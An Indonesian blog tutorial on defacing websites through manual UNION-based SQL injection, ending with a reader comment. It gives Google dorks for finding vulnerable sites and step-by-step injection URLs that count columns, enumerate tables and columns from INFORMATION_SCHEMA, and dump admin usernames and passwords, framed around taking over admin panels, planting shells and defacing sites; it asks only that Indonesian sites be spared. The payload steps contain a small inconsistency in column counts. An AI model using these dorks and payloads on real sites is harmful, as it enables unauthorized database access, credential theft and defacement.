Cara Deface SQL Injection Union secara manual
Hello guys semoga anda siap dengan tutorial ini. dalam tutorial ini kita akan membahas tentang dasar SQL injection union berbasis manual jadi pertama saya ingin merekomendasikan anda untuk mempelajari dasar SQL dari w3schools. jadi mari saya mulai dari pendahuluan
Apa itu SQL Injection?
SQL Injection adalah jenis kerentanan kode injeksi pada lapisan database. Sebuah injeksi sql yang sukses mengeksploitasi dapat membaca dan memodifikasi database backend. Kerentanan ini dapat ditemukan saat input pengguna salah disaring untuk string.Apa yang bisa dilakukan penyerang(Attacker)?
Seorang penyerang bisa menyuntikkan di website dan bisa membaca dan memodifikasi database.
Seorang penyerang bisa mengendalikan panel admin Anda jika Anda memilikinya.
Jika situs yang ditargetkan adalah E-commerce dan website menyimpan informasi maka penyerang bisa dengan mudah mendapatkannya.
Penyerang bisa menanam shell dan merusak situs web.
Jadi mari kita mulai pekerjaan kita ....
Langkah 1:
Temukan situs rawan SQL Injection dengan google dorks. Disini saya telah update Dorks tanggal 23 Desember 2017 : DOWNLOAD DISINI
inurl:index.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:shop.php?id=
Langkah 2:
Sekarang Anda harus memeriksa kerentanannya dengan menambahkan satu kutipan setelah parameter id dan tekan enter jika Anda akan mendapatkan pesan kesalahan seperti sql syntax error yang berarti situs rentan terhadap serangan sql.
www.vulnerablesite.com/index.php?id=1'
Langkah 3:
Sekarang setelah memeriksa kerentanan jika situs tersebut rentan maka Anda harus menemukan jumlah kolom dengan menggunakan perintah berdasarkan pernyataan.
www.vulnerablesite.com/index.php?id=1' order by 1 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 2 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 3 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 4 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 5 --+ [error]
Di sini saya mendapat pesan kesalahan di angka 5 yang berarti jumlah kolom adalah 5.
Langkah: 4
Sekarang kita akan cari kolom vuln menggunakan perintah union
www.vulnerablesite.com/index.php?id=1' union select 1,2,3,4 -- +
Seperti yang bisa Anda lihat di kolom rentan gambar di atas adalah 2 hal berikut yang akan kita gunakan perintah ini.
Version - @@version also version() Database- database() Current User - user()
Langkah 5:
Sekarang kita akan menemukan nama tabel paste saja query ini di kolom rentan yang diberikan di bawah ini.
(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE())
Langkah 6:
kita akan menemukan nama kolom tabel tertentu hanya menggunakan query ini.
www.vulnerablesite.com/index.php?id=1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name= [table name in hex]
ya sekarang kita punya nama kolom nama tabel dan target kita selanjutnya adalah membuang data.
Langkah 7:
Sekarang kita punya database, nama tabel dan nama kolom juga jadi kita akan dump database dari situs yang ditargetkan. ganti kolom_name dengan kolom target misalnya. admin, user e.t.c dan tambahkan terakhir dari tabel yang ditargetkan.
www.vulnerablesite.com/index.php?id=1' union select 1,group_concat(username,0x3a,password),3,4 from admin--+
ya kita punya username dan password
PESAN : terus belajar, jangan pantang menyerah...!!!
Dan JANGAN RUSAK SITUS INDONESIA !!! Hargai Karya Anak Bangsa !!!
DORK : UPDATE DESEMBER 2017 DOWNLOAD DISINI
DORK : UPDATE DESEMBER 2017 DOWNLOAD DISINI
Thanks for reading & sharing BELAJAR DIKACANGIN
yang langkah:4, SQL injection manually itu gimana
ReplyDeletecari di google atau gimana?